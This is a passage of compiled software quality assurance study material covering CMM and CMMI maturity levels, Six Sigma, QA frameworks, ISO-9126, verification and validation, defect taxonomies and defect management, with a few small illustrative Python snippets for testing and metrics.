• Peer Review: Work products, such as requirements, design, and code, are reviewed by peers to find defects at an early stage. Peer reviews can be performed by means of inspections and walkthroughs.

Level 4: Managed At this level, metrics play a key role. Metrics concerning processes and products are collected and analyzed. Those metrics are used to gain quantitative insight into both process and product qualities. When the metrics show that limits are being exceeded, corrective actions are triggered. For example, if too many test cases fail during system testing, it is useful to start a process of root cause analysis to understand why so many tests are failing. The KPAs at level 4 are as follows:

• Quantitative Process Management: Process data indicate how well a process is performing. If a process does not perform as expected, the process is improved by considering the measured data.

• Software Quality Management: The quality attributes of products are measured in quantitative form to gain better insight into the processes and products. Improvements are incorporated into the processes, and their effectiveness is evaluated by measuring product quality attributes.

Level 5: Optimizing At this level, organizations strive to improve their processes on a continual basis. This is achieved in two steps: (i) observe the effects of processes, by measuring a few key metrics, on the quality, cost, and lead time of software products and (ii) effect changes to the processes by introducing new techniques, methods, tools, and strategies. The following are the KPAs at level 5:

• Defect Prevention: This means analyzing the root causes of different classes of defects and taking preventive measures to ensure that similar defects do not recur.

• Technology Change Management: This means identifying useful techniques, tools, and methodologies and gradually introducing those into software processes. The key idea is to take advantage of new developments in technologies.

• Process Change Management: This means improving an organization's processes to have a positive impact on quality, productivity, and development time.


9.3 Common Features of Key Practices

The key practices in every KPA are organized into five categories called common features, as explained in the following. Common features are attributes of key practices that indicate whether the implementation or institutionalization of a KPA is effective, repeatable, and lasting.

• Commitment to Perform: An organization must show in action – not merely in words – that it is committed to process improvement. Upper management actions, such as establishing organizational policies and allocating resources to process improvement activities, give evidence that an organization is committed to perform in a better way. For example, management can formulate a policy to use established and enduring processes.

• Ability to Perform: The ability of an organization to realize a process in a competent manner is determined by the organization's structure, resources, and people to execute the process. Availability of adequately trained personnel and their attitude to change have a positive impact on their ability to perform.

• Activities Performed: These describe what needs to be implemented to establish the capability of a process. They include the roles and procedures required to realize KPAs. Typical activities performed to realize KPAs are making plans, executing the plans, tracking the work, and taking corrective actions to ensure that work stays close to the plan.

• Measurement and Analysis: Measurement is key to knowing the current status and effectiveness of a process. Measurement involves gathering data that can reveal the progress and effectiveness of processes. The gathered data must be analyzed to gain insight into the processes. Measurement and analysis must be performed to be able to take corrective actions.

• Verifying Implementation: After having policies and processes in place, it is necessary that activities be performed in compliance with the standard process. Compliance with the standard process can be checked by performing frequent audits and reviews.

9.4 Application of CMM

For an organization to be at a certain level of maturity, all the goals of all the KPAs at that level – and at all preceding levels too – must be satisfied. For example, for an organization to be at level 2, all six KPAs associated with level 2 must be satisfied. For an organization to be at level 3, the organization must meet all six KPAs associated with level 2 and all seven KPAs associated with level 3. The SEI provides two methodologies to evaluate the current capabilities of organizations: internal assessments and external evaluations. The SEI developed the capability maturity model–based assessment internal process improvement (CBA-IPI) to assist organizations in self-assessment. The CBA-IPI uses the CMM as a reference model to evaluate the process capability of organizations by identifying which KPAs are being satisfied and which need to be improved.
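The level-determination rule just described is easy to express in code. The following Python sketch uses the KPA names from Figure 18.2; the sample organization and its set of satisfied KPAs are hypothetical:

    # KPAs per maturity level, following Figure 18.2 (level 1 has none).
    KPAS = {
        2: {"requirements management", "software project planning",
            "software project tracking and oversight",
            "software subcontract management", "software quality assurance",
            "software configuration management"},
        3: {"organization process focus", "organization process definition",
            "training program", "integrated software management",
            "software product engineering", "intergroup coordination",
            "peer review"},
        4: {"quantitative process management", "software quality management"},
        5: {"defect prevention", "technology change management",
            "process change management"},
    }

    def maturity_level(satisfied: set[str]) -> int:
        """An organization is at level N only if it satisfies the KPAs of
        level N and of every preceding level; level 1 requires nothing."""
        level = 1
        for next_level in (2, 3, 4, 5):
            if KPAS[next_level] <= satisfied:   # subset test
                level = next_level
            else:
                break
        return level

    # Hypothetical organization satisfying all level 2 KPAs plus peer review:
    org = KPAS[2] | {"peer review"}
    print(maturity_level(org))  # 2 -- level 3 is still incomplete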


The SEI developed the CMM appraisal framework (CAF) to provide a mechanism for formal evaluation of organizations. The CAF describes the requirements and guidelines to be used by external assessors in designing CAF-compliant evaluation methods.

9.5 Capability Maturity Model Integration (CMMI)

After the development and successful application of the CMM in the software area, known as software CMM (CMM-SW), CMMs in other areas were developed as well.

The CMM for software, known as CMM-SW, was first released in 1991 as CMM-SW version 1.0, followed by CMM-SW version 1.1 in 1993. After its first release, many software organizations used it for self and external evaluations. The success of CMM-SW led to the development of CMMs in other areas. Thus, the concept of the CMM is not software specific. In order to appreciate the wide applicability of the CMM, we remind the reader of the following: a CMM is a reference model of mature practices in a specific discipline, used to appraise and improve a group's capability to perform that discipline. To name a few, there are several CMMs as follows:

• Software CMM

• Systems engineering CMM

• Integrated product development CMM

• Electronic industry alliance 731 CMM

• Software acquisition CMM

• People CMM

• Supplier sourcing CMM

It is apparent from the above examples of the CMM that they are likely to have different characteristics. The CMMs differ in three ways, namely, discipline, structure, and definition of maturity. First, different CMMs are applied to different disciplines, such as software development, systems engineering, software acquisition, and people. Second, improvements can be made continuously or in distinct stages. Finally, the definition of maturity is dependent upon the entity under consideration. It is obvious that people and software acquisition mature in different ways, and their maturity is defined in different ways.

As more than one CMM was applied in an organization, a number of problems surfaced, for the following reasons:

• Different models have different structures, different ways of measuring maturity, and different terms.

• It was difficult to integrate the different CMMs to achieve the common organizational goal, which is to produce low-cost, high-quality products within schedule.

• It was difficult to use many models in supplier selection and subcontracting.


Therefore, a pressing need was felt for a unified view of process improvement throughout an organization. Thus evolved the idea of the CMMI. The CMMI includes information from the following models:

• Capability maturity model for software (CMM-SW)

• Integrated product development capability maturity model (IPD-CMM)

• Capability maturity model for systems engineering (CMM-SE)

• Capability maturity model for supplier sourcing (CMM-SS)

The usefulness of the CMMI is readily recognized by considering the following facts. First, today's complex software systems are often built by using some subsystems developed by other parties. For example, a security module may be purchased from another vendor. Similarly, a communication module may be obtained from a vendor specializing in communication systems. There is a need for evaluating the maturity of the suppliers. Second, large systems often contain a number of diverse components, such as databases, communications, security, and real-time processing. Coexistence and interoperability of the diverse systems, which might have been developed by different vendors, are paramount to the successful operation of larger systems. Consequently, it is important to evaluate the maturity level of an integrated product development process. Third, in general, complex software systems often need to run on specialized execution platforms. For example, Internet routing software runs on specialized hardware and a specialized operating system, rather than the commonly used hardware platforms and operating systems. Those kinds of software need to be developed in the right system context.

10. Six Sigma Model

Given that we are trying to provide a reasonably complete picture of the better-known quality models and philosophies, we also need to at least mention Six Sigma. Six Sigma can be viewed as a management philosophy that uses customer-focused measurement and goal-setting to create bottom-line results. It strongly advocates listening to the voice of the customer and converting customer needs into measurable requirements.


Quality frameworks

A Quality Assurance Framework must be defined and implemented across all business-critical programmes, to help drive consistency and successful business outcomes.

Quality assurance (QA) frameworks allow community and voluntary organizations to look at their strengths and weaknesses and continuously improve their quality of service. Naturally, funders and other stakeholders welcome this.

Typically, this would be in support of a client’s programme goals, which might be:

• Building confidence in the integrity of the Quality Assurance approach across the BUs delivering in to the programme

• Delivering objective, realistic and accurate reporting of progress and coverage, to a consistent standard, across the programme and expressed in Business terms

• Managing delivery risks effectively, providing appropriate, relevant and objective information to management to support appropriate decision taking

• Assuring delivery across the programme, meaning that the right things are being done for the right reasons in the right way

• Creating robust and reliable evidence of progress, outcomes and decisions (to support audit and regulatory purposes)

• Providing objective, accurate information to support critical decision points.

Once implemented and fully operational, a Quality Assurance Framework will give you the following benefits:

• Deliver an objective view of the residual risk at any given point of the delivery for the programme team, both project and product risk

• Report on the quality of the deliverables in absolute and “Earned Value” terms, allowing the key stakeholders to understand the residual risk contained within the programme at any given point

• Identify risks and issues inherent to the programme delivery and ensures that these are visible until managed or mitigated

• Provide metrics and evidence to support compliance to regulatory standards

• Provide direct support to the key decision points in the programme by providing objective and timely information to key stakeholders and the Steering Committee in terms that are meaningful to them, and frame the Business consequences of the findings (especially defects residual in the system or missing scope) via the Assurance disciplines outlined below.

• Primarily assure that the programme deliverables are the “right things, built the right way”

• Help to drive through strategic transformation in change programmes


There are a number of common scenarios, such as differences in approach and maturity levels across an organization, which stop programmes from optimizing their capabilities and which increase both product and business risk - ultimately leading to increased cost as more errors need to be fixed late in the day.

Why use a Quality Assurance Framework?

A QA framework can help to:

• work out priorities • improve service user involvement in the charity • create better working practices and policies • get the management committee more involved and take more responsibility • improve the physical environment for service users • improve the relationship between volunteers and users.

These frameworks enable community organizations and charities to build standards around the needs of their users, whilst also ensuring that they have processes in place so that their own governance and management are complete and up to the task.

Benefits of Quality Assurance Frameworks

Organizations using a QA framework can gain the following benefits:

• more effective and more efficient systems and procedures • better quality of services for users • better communication among staff, trustees and volunteers • increased motivation for staff, trustees and volunteers • greater credibility and legitimacy with funders • more creative thinking, enabling new perspectives and ways of working • organizational learning • continuous improvement over time.


2.2 QUALITY FRAMEWORKS AND ISO-9126

Based on the different quality views and expectations outlined above, quality can be defined accordingly. In fact, we have already mentioned various so-called "-ilities" connected to the term quality, such as reliability, usability, portability, maintainability, etc. Various models or frameworks have been proposed to accommodate these different quality views and expectations, and to define quality and related attributes, features, characteristics, and measurements. We next briefly describe ISO-9126 (ISO, 2001), the most influential one in the software engineering community today, and discuss various adaptations of such quality frameworks for specific application environments.

ISO-9126

ISO-9126 (ISO, 2001) provides a hierarchical framework for quality definition, organized into quality characteristics and sub-characteristics. There are six top-level quality characteristics, each associated with its own exclusive (non-overlapping) sub-characteristics, as summarized below (a small code sketch after the list restates the hierarchy):

• Functionality: A set of attributes that bear on the existence of a set of functions and their specified properties. The functions are those that satisfy stated or implied needs. The sub-characteristics include:

- Suitability

- Accuracy

- Interoperability

- Security

• Reliability: A set of attributes that bear on the capability of software to maintain its level of performance under stated conditions for a stated period of time. The sub-characteristics include:

- Maturity

- Fault tolerance

- Recoverability

• Usability: A set of attributes that bear on the effort needed for use, and on the individual assessment of such use, by a stated or implied set of users. The sub-characteristics include:

- Understandability

- Learnability

- Operability

• Efficiency: A set of attributes that bear on the relationship between the level of performance of the software and the amount of resources used, under stated conditions. The sub-characteristics include:

- Time behavior

- Resource behavior


• Maintainability: A set of attributes that bear on the effort needed to make specified modifications. The sub-characteristics include:

- Analyzability

- Changeability

- Stability

- Testability

• Portability: A set of attributes that bear on the ability of software to be transferred from one environment to another. The sub-characteristics include:

- Adaptability

- Installability

- Conformance

- Replaceability
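As noted above, the hierarchy can be encoded directly. This Python sketch merely restates the list in code form, with a reverse lookup that exploits the non-overlapping property:

    # ISO-9126 quality characteristics and their exclusive sub-characteristics,
    # exactly as listed above.
    ISO_9126 = {
        "functionality": ["suitability", "accuracy", "interoperability", "security"],
        "reliability": ["maturity", "fault tolerance", "recoverability"],
        "usability": ["understandability", "learnability", "operability"],
        "efficiency": ["time behavior", "resource behavior"],
        "maintainability": ["analyzability", "changeability", "stability", "testability"],
        "portability": ["adaptability", "installability", "conformance", "replaceability"],
    }

    def characteristic_of(sub: str) -> str:
        """Find the top-level characteristic owning a sub-characteristic.
        The answer is unique because ISO-9126's hierarchy is strict."""
        for characteristic, subs in ISO_9126.items():
            if sub in subs:
                return characteristic
        raise KeyError(sub)

    print(characteristic_of("testability"))  # maintainability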

Alternative frameworks and focus on correctness

ISO-9126 offers a comprehensive framework to describe many attributes and properties we associate with quality. There is a strict hierarchy, where no sub-characteristics are shared among quality characteristics. However, certain product properties are linked to multiple quality characteristics or sub-characteristics (Dromey, 1995; Dromey, 1996). For example, various forms of redundancy affect both efficiency and maintainability. Consequently, various alternative quality frameworks have been proposed to allow for more flexible relations among the different quality attributes or factors, and to facilitate a smooth transition from specific quality concerns to specific product properties and metrics.

Many companies and communities associated with different application domains have adapted and customized existing quality frameworks to define quality for themselves, taking into consideration their specific business and market environment. One concrete example is the quality attribute list CUPRIMDS (capability, usability, performance, reliability, installation, maintenance, documentation, and service) that IBM used for its software products (Kan, 2002). CUPRIMDS is often used together with overall customer satisfaction (thus the acronym CUPRIMDSO) to characterize and measure software quality for IBM's software products.

Similarly, a set of quality attributes has been identified for web-based applications (Offutt, 2002), with reliability, usability, and security as the primary quality attributes, and availability, scalability, maintainability, and time to market as the secondary ones. Such prioritized schemes are often used for specific application domains. For example, performance (or efficiency) and reliability would take precedence over usability and maintainability for real-time software products, while it might be the other way round for mass-market products for end users.

Among the software quality characteristics or attributes, some deal directly with functional correctness, or conformance to specifications as demonstrated by the absence of problems or instances of non-conformance. Other quality characteristics or attributes deal with usability, portability, etc. Correctness is typically related to several quality characteristics or sub-characteristics in the quality frameworks described above. For example, in ISO-9126 it is related to both functionality, particularly its accuracy (in other words, conformance) sub-characteristic, and reliability.


Verification and Validation

• Validation: Are we building the right system?
• Verification: Are we building the system right?

Verification looks at the software product and ensures it has been designed and built to specifications, and is free of defects. Validation confirms with the user that everything is working correctly and to their expectations.

In other words, validation is checking that the system will meet the customer’s needs while verification is checking whether the system is well-engineered, without error, etc. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

The IEEE standard, in its fourth edition, defines the two terms as follows:

• "Validation. The assurance that a product, service, or system meets the needs of the customer and other identified stakeholders. It often involves acceptance and suitability with external customers. Contrast with verification."

• "Verification. The evaluation of whether or not a product, service, or system complies with a regulation, requirement, specification, or imposed condition. It is often an internal process. Contrast with validation."

The ISO 9001 standard defines them this way:

• Verification is the confirmation that a product meets identified specifications.
• Validation is the confirmation that a product appropriately meets its design function or the intended use.



The distinction between the two terms is largely to do with the role of specifications. Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

Verification includes all the activities associated with producing high-quality software: testing, inspection, design analysis, specification analysis, and so on. It is a relatively objective process, in that, if the various products and documents are expressed precisely enough, no subjective judgments should be needed in order to verify software.

In contrast, validation is an extremely subjective process. It involves making subjective assessments of how well the (proposed) system addresses a real-world need. Validation includes activities such as requirements modeling, prototyping and user evaluation.

In a traditional phased software lifecycle, verification is often taken to mean checking that the products of each phase satisfy the requirements of the previous phase. Validation is relegated to just the beginning and ending of the project: requirements analysis and acceptance testing. This view is common in many software engineering textbooks, and it is misguided. It assumes that the customer's requirements can be captured completely at the start of a project, and that those requirements will not change while the software is being developed. In practice, the requirements change throughout a project, partly in reaction to the project itself: the development of new software makes new things possible. Therefore both validation and verification are needed throughout the lifecycle.

Verification Techniques

There are many different verification techniques, but they all basically fall into two major categories: dynamic testing and static testing.

• Dynamic testing - Testing that involves the execution of a system or component. Basically, a number of test cases are chosen, where each test case consists of test data. These input test cases are used to determine output test results. Dynamic testing can be further divided into three categories: functional testing, structural testing, and random testing.

• Functional testing - Testing that involves identifying and testing all the functions of the system as defined within the requirements. This form of testing is an example of black-box testing since it involves no knowledge of the implementation of the system.

• Structural testing - Testing that has full knowledge of the implementation of the system and is an example of white-box testing. It uses the information from the internal structure of a system to devise tests to check the operation of individual components. Functional and structural testing both choose test cases that investigate a particular characteristic of the system.

• Random testing - Testing that freely chooses test cases from the set of all possible test cases. The use of randomly determined inputs can detect faults that go undetected by other, systematic testing techniques. Exhaustive testing, where the input test cases consist of every possible set of input values, is a form of random testing. Although exhaustive testing performed at every stage in the life cycle would result in a complete verification of the system, it is realistically impossible to accomplish. [Andriole86] (A small sketch of random testing follows this list.)

• Static testing - Testing that does not involve the operation of the system or component. Some of these techniques are performed manually while others are automated. Static testing can be further divided into two categories: techniques that analyze consistency and techniques that measure some program property.

• Consistency techniques - Techniques that are used to ensure program properties such as correct syntax, correct parameter matching between procedures, correct typing, and correct translation of requirements and specifications.

• Measurement techniques - Techniques that measure properties such as error proneness, understandability, and how well structured the program is.
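As referenced above, here is a minimal sketch of random (dynamic) testing in Python. It drives randomly generated inputs through a hypothetical unit under test and compares its output against an independent oracle; the function clamp and the input ranges are invented for the example:

    import random

    def clamp(x: int, low: int, high: int) -> int:
        # Hypothetical unit under test: keep x within [low, high].
        return max(low, min(x, high))

    def reference(x: int, low: int, high: int) -> int:
        # Independent (slower but obviously correct) oracle:
        # the clamped value is the median of the three numbers.
        return sorted([low, x, high])[1]

    random.seed(0)  # reproducible run
    for _ in range(10_000):
        x = random.randint(-1000, 1000)
        low = random.randint(-1000, 1000)
        high = random.randint(low, 1000)  # keep the interval well formed
        assert clamp(x, low, high) == reference(x, low, high), (x, low, high)
    print("10,000 random test cases passed")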


Validation

Validation can be performed progressively throughout the development life cycle. For example, written user requirements can be validated by creating a model or prototype and asking the user to confirm (or validate) that the demonstrated functionality meets their needs. System testing is a major validation event, where a system is validated against the user's statement of requirements. It aims to show that all faults which could degrade system performance have been removed before the system is operated. Validation is not complete, however, until the end user formally agrees that the operational system is fit for purpose.

Validation Techniques

There are also numerous validation techniques, including formal methods, fault injection, and dependability analysis. Validation usually takes place at the end of the development cycle, and looks at the complete system as opposed to verification, which focuses on smaller sub-systems.

• Formal methods - Formal methods are not only a verification technique but also a validation technique. The term denotes the use of mathematical and logical techniques to express, investigate, and analyze the specification, design, documentation, and behavior of both hardware and software.

• Fault injection - Fault injection is the intentional activation of faults by either hardware or software means to observe the system operation under fault conditions.

• Hardware fault injection - Can also be called physical fault injection because we are actually injecting faults into the physical hardware.

• Software fault injection - Errors are injected into the memory of the computer by software techniques. Software fault injection is basically a simulation of hardware fault injection (see the sketch after this list).

• Dependability analysis - Dependability analysis involves identifying hazards and then proposing methods that reduces the risk of the hazard occurring.

• Hazard analysis - Involves using guidelines to identify hazards, their root causes, and possible countermeasures.

• Risk analysis - Takes hazard analysis further by identifying the possible consequences of each hazard and their probability of occurring.
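The sketch referenced above illustrates software fault injection in Python: a bit is flipped in a checksum-guarded buffer to emulate a memory fault, and the system's detection behavior is observed. The buffer contents and the toy checksum are invented for the example:

    import random

    def checksum(data: bytes) -> int:
        # Toy integrity check; a real system might use CRC32 or a hash.
        return sum(data) % 256

    # A "memory" region guarded by a checksum (hypothetical example).
    memory = bytearray(b"sensor reading: 42")
    stored_sum = checksum(bytes(memory))

    # Software fault injection: flip one random bit to emulate a hardware fault.
    random.seed(1)
    byte_index = random.randrange(len(memory))
    memory[byte_index] ^= 1 << random.randrange(8)

    # Observe the system's behavior under the fault condition.
    if checksum(bytes(memory)) != stored_sum:
        print(f"fault detected at byte {byte_index}")
    else:
        print("fault escaped detection")  # possible with a weaker check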

Most quality assurance activities that are carried out directly in the software development process can be classified as verification activities, while quality assurance activities that are associated with the technical requirements of the users, at the very beginning or the very end of the engineering process, are classified as validation activities.


Advantages of Software Verification:

1. Verification helps in lowering the count of defects in the later stages of development.

2. Verifying the product at the starting phase of development helps in understanding the product in a better way.

3. It reduces the chances of failures in the software application or product.

4. It helps in building the product as per the customer's specifications and needs.

Advantages of Validation:

1. If some defects are missed during verification, they can be caught as failures during the validation process.

2. If some specification was misunderstood during verification and development proceeded on that basis, then during the validation process, while executing that functionality, the difference between the actual result and the expected result can be understood.

3. Validation is done during testing activities such as feature testing, integration testing, system testing, load testing, compatibility testing, stress testing, etc.

4. Validation helps in building the right product as per the customer's requirements and helps in satisfying their needs.


Defect taxonomy

A defect is a structural property of a software document of any kind (e.g. requirements description, test plan, source code, configuration file), namely a deviation from the nearest (i.e. most similar) correct document that makes the document incorrect or locally incorrect. A taxonomy is a system of hierarchical categories designed to be a useful aid for reproducibly classifying things.

Purpose of a defect taxonomy

The following considerations assume that defects are recorded when they are found throughout the software process, including their classification according to the defect taxonomy. Then a defect taxonomy can serve one or several of the following purposes:

• Understanding process characteristics: Recording defects and classifying them can help understand the process with respect to all those activities that produce defects. In particular, they help in identifying process weaknesses (high-defect steps).

• Understanding product characteristics:
  o Identifying points needing rework: Clusters of defects point to documents that need rework.
  o Suggesting rework approaches: The kinds of defects may point out the best approach for doing the rework (e.g. direct repair, review, redesign, retest, etc.).

• Providing project guidance: Defect characteristics of artifacts may help with risk assessment for process decisions such as task priorities, go/no-go decisions, reimplementation decisions, etc.
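To make the recording-and-classifying idea concrete, here is a minimal Python sketch; the taxonomy categories and the logged defects are invented, and a real taxonomy would be far larger and would evolve over time:

    from collections import Counter

    # A tiny, made-up defect taxonomy (category -> defect kinds).
    TAXONOMY = {
        "requirements": ["ambiguous", "missing", "contradictory"],
        "design": ["interface mismatch", "missing error handling"],
        "code": ["logic", "off-by-one", "resource leak"],
    }

    def classify(category: str, kind: str) -> str:
        """Validate a classification against the taxonomy and return a path."""
        if kind not in TAXONOMY.get(category, []):
            raise ValueError(f"not in taxonomy: {category}/{kind}")
        return f"{category}/{kind}"

    # Defects recorded as they are found throughout the process.
    log = [classify("code", "logic"), classify("code", "logic"),
           classify("design", "missing error handling")]

    # Clusters point to process weaknesses and documents needing rework.
    print(Counter(log).most_common(1))  # [('code/logic', 2)]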


A Good Defect Taxonomy for Testing Purposes

1. Is expandable and ever-evolving

2. Has enough detail for a motivated, intelligent newcomer to be able to understand it and learn about the types of problems to be tested for

3. Can help someone with moderate experience in the area (like me) generate test ideas and raise issues

The most practical application of defect taxonomies is brainstorming test ideas in a systematic manner.


Defect management

Software defects are expensive. Moreover, the cost of finding and correcting defects represents one of the most expensive software development activities. For the foreseeable future, it will not be possible to eliminate defects. While defects may be inevitable, we can minimize their number and their impact on our projects. To do this, development teams need to implement a defect management process that focuses on preventing defects, catching defects as early in the process as possible, and minimizing the impact of defects. A little investment in this process can yield significant returns.

Principles

The defect management process is based on the following general principles:

• The primary goal is to prevent defects. Where this is not possible or practical, the goals are to both find the defect as quickly as possible and minimize its impact.

• The defect management process should be risk driven – i.e., strategies, priorities, and resources should be based on the extent to which risk can be reduced.

• Defect measurement should be integrated into the software development process and be used by the project team to improve the process. In other words, the project staff, by doing their job, should capture information on defects at the source. It should not be done after the fact by people unrelated to the project or system.

• As much as possible, the capture and analysis of the information should be automated.

• Defect information should be used to improve the process. This, in fact, is the primary reason for gathering defect information. Most defects are caused by imperfect or flawed processes. Thus, to prevent defects, the process must be altered.

The defect management process plays a key role during the software testing life cycle. Since one of the objectives of testing is to find defects, the discrepancies between actual and expected outcomes need to be logged as defects, bugs, or incidents. In order to manage all defects to completion, an organization should establish a process and rules for classification. Defects may be raised during development, review, testing or use of a software product. They may be raised for issues in code or the working system, or in any type of documentation, including development documents, test documents or user information such as "Help" or installation guides. Defect reports have the following objectives:

- Provide developers and other parties with feedback about the problem to enable identification, isolation and correction as necessary.
- Provide test leaders a means of tracking the quality of the system under test and the progress of the testing.
- Provide ideas for test process improvement.

A tester or reviewer typically logs the following information, if known, regarding a defect:

- Date of issue, issuing organization, author, approvals and status.
- Scope, severity and priority of the incident.
- References, including the identity of the test case specification that revealed the problem.

Details of the defect report may include:

- Defect title and summary.
- Defect description with steps to reproduce.
- Expected and actual results.
- Date the incident was discovered.
- Identification or configuration item of the software or system.
- Software or system life cycle process in which the incident was observed.
- Description of the anomaly to enable resolution.
- Degree of impact on stakeholder(s) interests.
- Severity of the impact on the system.
- Urgency/priority to fix.
- Status of the incident, such as open, deferred, duplicate, waiting to be fixed, fixed awaiting confirmation test, or closed.
- Conclusions and recommendations.
- Global issues, such as other areas that may be affected by a change resulting from the defect.
- Change history, such as the sequence of actions taken by project team members with respect to the incident to isolate, repair and confirm it as fixed.
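A defect report with fields like those listed above maps naturally onto a record type. The following Python sketch models a small subset of the fields, with the status values taken from the list; the field selection and the sample defect are illustrative only:

    from dataclasses import dataclass, field
    from datetime import date

    # Status values taken from the list above.
    STATUSES = {"open", "deferred", "duplicate", "waiting to be fixed",
                "fixed awaiting confirmation test", "closed"}

    @dataclass
    class DefectReport:
        """A subset of the report fields listed above (sketch only)."""
        title: str
        description: str           # including steps to reproduce
        expected_result: str
        actual_result: str
        severity: str              # impact on the system
        priority: str              # urgency to fix
        status: str = "open"
        date_discovered: date = field(default_factory=date.today)
        change_history: list[str] = field(default_factory=list)

        def transition(self, new_status: str, note: str) -> None:
            # Track the sequence of actions taken on the incident.
            if new_status not in STATUSES:
                raise ValueError(new_status)
            self.change_history.append(f"{self.status} -> {new_status}: {note}")
            self.status = new_status

    bug = DefectReport("Login fails", "1. open app 2. log in",
                       "dashboard shown", "error 500",
                       severity="high", priority="urgent")
    bug.transition("fixed awaiting confirmation test", "patched session handling")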

Defect management Process

A defect can be defined as an unexpected behavior of the software. No software exists without defects or bugs. The elimination of bugs from the software depends upon the efficiency of the testing done on the software. A defect is basically the difference between the expected result and the actual result.


A defect is a specific concern about the quality of an Application under Test (AUT).

The cost of finding and correcting defects represents one of the most expensive software development activities. Defects should be found as early as possible to reduce the cost of fixing them; if a defect is found in a later phase, the cost of fixing that bug is much higher.

It is a fact that it will not be possible to eliminate all defects from the software. While defects may be inevitable, we can minimize their number and impact on our projects. To do this, the project management team needs to implement a defect management process (DMP) that focuses on preventing defects, finding defects as early as possible in the process, and minimizing the impact of defects.

Defect Management Process:

The defect management process, whose general principles were outlined above, consists of the following parts: defect prevention, baseline delivery, defect discovery, defect resolution, and process improvement.

[Figure: Defect Management Process]

Defect Prevention: It is a process of improving quality and productivity by preventing the injection of defects into a software product. It is virtually impossible to eliminate the defects altogether.

Objectives of the defect prevention process are:

1. Identify and analyze the causes of defects so that their occurrence can be reduced.
2. Reduce the number of defect categories.
3. Reduce the most frequent types of defects, such as "not following coding guidelines" or ambiguity within requirements and specifications.
4. Reduce the extent of defect escapes between the test phase and the release.
5. Establish practices within projects to identify defects early in the process.
6. Set goals for improving critical processes, with team-level accountability.
7. Since it is practically impossible to prevent all defects in the software, testers and developers should collaborate for quick detection of defects to minimize the risk; they should assess the critical risks associated with the system and identify the related defects.

Baseline Delivery: This step of the DMP occurs when a predefined milestone is finished and the product is baselined; further development then continues toward the next milestone. A product should be considered baselined when the developers hand it over to the testers for testing.

Defect Discovery: A defect is said to be discovered when it is brought to the attention of the developers and acknowledged (i.e., "accepted") as valid. The team should find defects before they become major problems and report them as soon as they are found so that they can be resolved. The team should also make sure that reported defects are acknowledged by the developers and confirmed as valid.

Defect Resolution: A resolution process needs to be established for cases where there is a dispute regarding a defect. For example, if the group uncovering the defect believes it is a defect but the developers do not, a quick-resolution process must be in place.

Two recommended resolution processes are:

o Escalation to management: a senior manager of the software department is selected to resolve the dispute.
o Arbitration by the product owner: the problem is discussed with the product owner to determine whether or not it is a defect.

Process Improvement:

Everyone has a different view of process improvement. A developer may think that an individual defect is not a big deal, yet the fact that the defect got into the product at all is a big deal. Testers reason that if a defect could travel that far into the process before it was captured, other defects may be present that have not yet been discovered. From the customer's point of view, a defect is anything that causes dissatisfaction, whether it originated in requirements, design, coding, or testing. Program leadership should therefore advise the teams to analyze the process, find the causes behind the defects, and use those findings to prevent similar defects.

So what can we do to improve the process? The defect management process has the following goals:

• Senior management must understand, support, and be a part of the defect management program.
• The defect management process should be integrated into the overall software development process and used by the team to improve that process.
• If automated scripts exist for the project, they should be used to find bugs as early as possible.
• Specific development approaches (e.g., testing, inspections, reviews, exit criteria) should be chosen based on project objectives.
• Efforts to improve the process should be driven by the measurement process: metrics, reporting, decision making, and so on.
• The defect management process should be risk driven.
• We can reduce the occurrence of defects by:
  o Reviewing test scenarios and test cases
  o Defining exit criteria for developer testing
  o Defining QA acceptance of development
  o Reviewing functional and non-functional requirements
  o Reviewing technical requirements
  o Baselining environments
  o Applying GUI checklists prior to test case execution

We can use critical metrics to implement process improvement. A critical-metrics review is a joint session that asks:

• What can we do to ensure that more defects are found earlier in the cycle?
• Have last-minute discoveries of defects been analyzed to determine why they were missed in our normal SIT test cycle?
• When these issues are found late in the cycle, what is done to ensure that we catch them next time?
• Are late discoveries stemming from the way our business team is doing their testing (ad hoc testing coming late in the process)?

Calculating Metrics and Phases

Below are a few metrics that should be included in the calculation:

• % Complete
• % Defects Corrected
• % Test Coverage
• % Rework
• % Test Cases Passed
• % Test Effectiveness
• % Test Cases Blocked
• % Test Efficiency
• First Run Fail Rate
• Defect Discovery Rate
• Overall Fail Rate
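As a rough sketch of how a few of these might be computed from raw test results (the exact definitions vary between organizations, so treat these formulas as assumptions):

def test_execution_metrics(total_cases: int, executed: int, passed: int,
                           blocked: int, first_run_failures: int) -> dict:
    """Compute a few common test-execution metrics as percentages.

    The formulas below are typical but not standardized; adjust them to
    your organization's definitions.
    """
    return {
        "% Complete": 100.0 * executed / total_cases,
        "% Test Cases Passed": 100.0 * passed / executed if executed else 0.0,
        "% Test Cases Blocked": 100.0 * blocked / total_cases,
        "First Run Fail Rate": 100.0 * first_run_failures / executed if executed else 0.0,
        "Overall Fail Rate": 100.0 * (executed - passed) / executed if executed else 0.0,
    }

# Example: 200 planned cases, 150 executed, 120 passed, 10 blocked,
# 25 failed on their first run.
print(test_execution_metrics(200, 150, 120, 10, 25))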


Identified Critical Risks: There are a few challenges that can affect the critical metrics:

o Technology risk: no advanced technology is available, or the existing technology is in its initial stages
o Tight target dates
o Limited budget
o Bottlenecks within the development and testing cycles
o Resource constraints
o Continuous changes in the requirements

Types of Errors: There are a few kinds of errors that we generally face. If we keep these in mind during software development, we can find more defects early in the process and support the improvement of the DMP.

Human Errors

• Omission:
  o Knowledge: lack of knowledge of the application.
  o Ignorance: errors arising from ignorance.
  o Informational: lack of information.
  o Process-related: lack of knowledge of the process.

• Translation:
  o Miscommunication: a flawed perception or understanding of the requirement.
  o Mismatch between solution and requirement: what is built does not match the requirements.
  o Mismatch between requirement and test case: test cases do not match the requirement, so it is very necessary to check the complete requirement first and then take a decision.

Design and Coding Errors

o Affect data integrity: affect the consistency and accuracy of data throughout the software development life cycle.
o Alter correctly stored data: a mistake made while altering data that was correctly stored in the database.
o Affect downstream system dependencies: affect the systems that depend on this one.
o Affect testing outcomes: if something wrong is built into the code, it can affect the outcome of the testing.

Testing Errors

• Failure to notice a problem
• Misreading the screen
• Failure to execute a planned test
• Criteria disagreements


16.5 STATISTICAL SOFTWARE QUALITY ASSURANCE

Statistical quality assurance reflects a growing trend throughout industry to become more quantitative about quality. For software, statistical quality assurance implies the following steps:

1. Information about software errors and defects is collected and categorized.

2. An attempt is made to trace each error and defect to its underlying cause (e.g., nonconformance to specifications, design error, violation of standards, poor communication with the customer).

